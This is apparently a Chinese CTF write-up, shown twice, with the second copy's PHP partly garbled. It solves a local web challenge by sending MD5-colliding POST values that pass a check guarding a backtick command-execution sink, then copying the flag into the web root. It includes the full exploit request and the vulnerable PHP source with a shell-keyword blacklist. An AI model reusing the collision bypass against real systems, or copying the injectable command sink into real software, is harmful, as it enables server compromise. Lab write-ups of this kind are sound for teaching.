标签 CQUST 下的文章

前言

学长出了道套娃题,花了点时间,没给源码就黑盒硬做。其实给了md5提示的,但没想到。

知识点

这道题难点主要是没给源代码,考点主要是:

* MD5 弱类型
* 代码审计

实践

  1. exp

    POST /index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=cp%20/flag%20/var/www/html/flag HTTP/1.1
Host: 127.0.0.1:20031
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    Content-Length: 307
    Content-Type: application/x-www-form-urlencoded
    a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

    注意手动改包时需要加上 Content-Type: application/x-www-form-urlencoded

    这样才能发POST数据

  2. 然后访问网站根目录下flag即可

  3. 当时拿到题就开始分析URL,img是一个将文件名hex转换后base64加密2次的结果,当时尝试直接修改内容为/flag取出内容,无果。尝试了各种方法,都不行,最后做出来时发现源码过滤写死了,先是把解码后的内容进行preg_replace,只保留了a-z,A-Z,1-9,.这些内容。

  4. 然后对第二个cmd进行测试,通过提示发现可能是考的md5弱类型,试了下,发现过滤了大部分使用函数,发现cp未过滤,通过将flag拷贝至网站根目录拿到flag。

  5. 拿到源码果不其然,img是写死了。

  6. 就硬套

    <?php
error_reporting(E_ALL || ~ E_NOTICE);
    header('content-type:text/html;charset=utf-8');
    $cmd = $_GET['cmd'];
    if (!isset($_GET['img']) || !isset($_GET['cmd']))
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
    $file = hex2bin(base64_decode(base64_decode($_GET['img'])));
    $file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
    if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi锝� no flag");
    } else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
    }
    echo $cmd;
    echo "<br>";
    if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
    } else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
    echo `$cmd`;
    } else {
    echo ("md5 is funny ~");
    }
    }
    ?>
    <html>
    <style>
    body{
    background:url(./bj.png)  no-repeat center center;
    background-size:cover;
    background-attachment:fixed;
    background-color:#CCCCCC;
    }
    </style>
    <body>
    </body>
    </html>

前言

学长出了道套娃题,花了点时间,没给源码就黑盒硬做。其实给了md5提示的,但没想到。

知识点

这道题难点主要是没给源代码,考点主要是:

* MD5 弱类型
* 代码审计

实践

  1. exp

    POST /index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=cp%20/flag%20/var/www/html/flag HTTP/1.1
Host: 127.0.0.1:20031
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 307
Content-Type: application/x-www-form-urlencoded

a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

    注意手动改包时需要加上 Content-Type: application/x-www-form-urlencoded
    这样才能发POST数据

  2. 然后访问网站根目录下flag即可

  3. 当时拿到题就开始分析URL,img是一个将文件名hex转换后base64加密2次的结果,当时尝试直接修改内容为/flag取出内容,无果。尝试了各种方法,都不行,最后做出来时发现源码过滤写死了,先是把解码后的内容进行preg_replace,只保留了a-z,A-Z,1-9,. 这些内容。

  4. 然后对第二个cmd进行测试,通过提示发现可能是考的md5弱类型,试了下,发现过滤了大部分使用函数,发现cp未过滤,通过将flag拷贝至网站根目录拿到flag。

  5. 拿到源码果不其然,img是写死了。

  6. 就硬套

    <?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd'])) 
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi锝� no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)``_POST['a'] !== (string)``_POST['b'] && md5(``_POST['a']) === md5(``_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

?>
<html>
<style>
  body{
   background:url(./bj.png)  no-repeat center center;
   background-size:cover;
   background-attachment:fixed;
   background-color:#CCCCCC;
}
</style>
<body>
</body>
</html>